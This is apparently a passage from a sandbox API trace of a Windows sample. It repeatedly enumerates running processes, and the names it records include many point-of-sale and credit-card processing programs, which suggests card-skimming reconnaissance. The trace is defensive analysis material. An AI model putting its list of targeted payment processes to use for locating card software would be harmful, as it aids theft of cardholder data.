th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="aldelo.exe")) returned 1 [0190.303] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="ccv_server.exe")) returned 1 [0190.308] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="centralcreditcard.exe")) returned 1 [0190.311] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="creditservice.exe")) returned 1 [0190.313] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="edcsvr.exe")) returned 1 [0190.315] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="fpos.exe")) returned 1 [0190.316] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="isspos.exe")) returned 1 [0190.318] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="mxslipstream.exe")) returned 1 [0190.320] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="omnipos.exe")) returned 1 [0190.322] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="spcwin.exe")) returned 1 [0190.375] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="spgagentservice.exe")) returned 1 [0190.377] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="utg2.exe")) returned 1 [0190.379] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1234, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="active-charge.exe")) returned 1 [0190.381] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1244, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="society-position-myself.exe")) returned 1 [0190.383] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x124c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="heavy.exe")) returned 1 [0190.385] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="mayvarious.exe")) returned 1 [0190.386] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1338, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0190.388] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1394, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0xa1c, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0190.390] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x60, pcPriClassBase=6, dwFlags=0x0, szExeFile="msfeedssync.exe")) returned 1 [0190.391] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12a0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0190.393] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc2c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x37c, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0190.396] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x6d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="9DC0.exe")) returned 1 [0190.397] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x778, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x6d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0190.399] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x610, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x60, pcPriClassBase=6, dwFlags=0x0, szExeFile="bcatcih")) returned 1 [0190.401] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdd8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x6d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="powershell.exe")) returned 1 [0190.403] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x79c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0xdd8, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0190.405] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd0c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0190.406] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd0c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 0 [0190.407] CloseHandle (hObject=0x17ec) returned 1 [0190.408] Sleep (dwMilliseconds=0x64) [0190.453] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x17ec [0190.507] Process32First (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0190.509] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x71, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0190.511] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x130, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0190.513] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0190.515] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0190.517] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x18, th32ParentProcessID=0x1b8, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0190.520] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x200, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1b8, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0190.522] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x218, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1f, th32ParentProcessID=0x1c0, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0190.524] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x220, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1c0, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0190.526] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x278, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2c, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0190.578] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0190.581] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x32c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x200, pcPriClassBase=13, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0190.582] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x360, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0190.584] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x37c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x18, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0190.585] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x38c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0190.587] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0190.588] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x22, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0190.590] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x60, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4d, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0190.591] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x468, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0190.593] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0190.594] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x568, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x60, pcPriClassBase=8, dwFlags=0x0, szExeFile="sihost.exe")) returned 1 [0190.596] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x640, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x33, th32ParentProcessID=0x620, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0190.597] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x674, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="RuntimeBroker.exe")) returned 1 [0190.599] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x6dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0190.600] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="ShellExperienceHost.exe")) returned 1 [0190.601] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x558, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="SearchUI.exe")) returned 1 [0190.603] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x824, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x21, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="SkypeHost.exe")) returned 1 [0190.604] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x884, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="dllhost.exe")) returned 1 [0190.606] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x8f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="OfficeClickToRun.exe")) returned 1 [0190.607] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa74, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x60, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0190.609] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0190.610] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc6c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0190.612] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe34, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x60, pcPriClassBase=8, dwFlags=0x0, szExeFile="WMIADAP.exe")) returned 1 [0190.657] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa94, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0190.665] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa1c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0190.666] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0190.668] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x624, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="onlawyerseek.exe")) returned 1 [0190.669] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd2c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="fact believe worker.exe")) returned 1 [0190.671] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="partner.exe")) returned 1 [0190.672] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xb00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="whole.exe")) returned 1 [0190.674] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="nation-choose.exe")) returned 1 [0190.675] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x514, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="insteadrecent.exe")) returned 1 [0190.677] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="side-end-death.exe")) returned 1 [0190.679] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x2e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="young every moment.exe")) returned 1 [0190.680] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa2c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="somethingvictim.exe")) returned 1 [0190.682] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x120, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="director_glass_possible.exe")) returned 1 [0190.683] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd68, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="accept.exe")) returned 1 [0190.685] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="ability-where-operation.exe")) returned 1 [0190.686] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x890, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="condition.exe")) returned 1 [0190.688] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x368, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="executive_anything.exe")) returned 1 [0190.689] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="movement indeed best.exe")) returned 1 [0190.691] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfbc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="memberheavy.exe")) returned 1 [0190.692] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1014, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="gardenpolitical.exe")) returned 1 [0190.694] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x101c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="program-him-cell.exe")) returned 1 [0190.695] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, 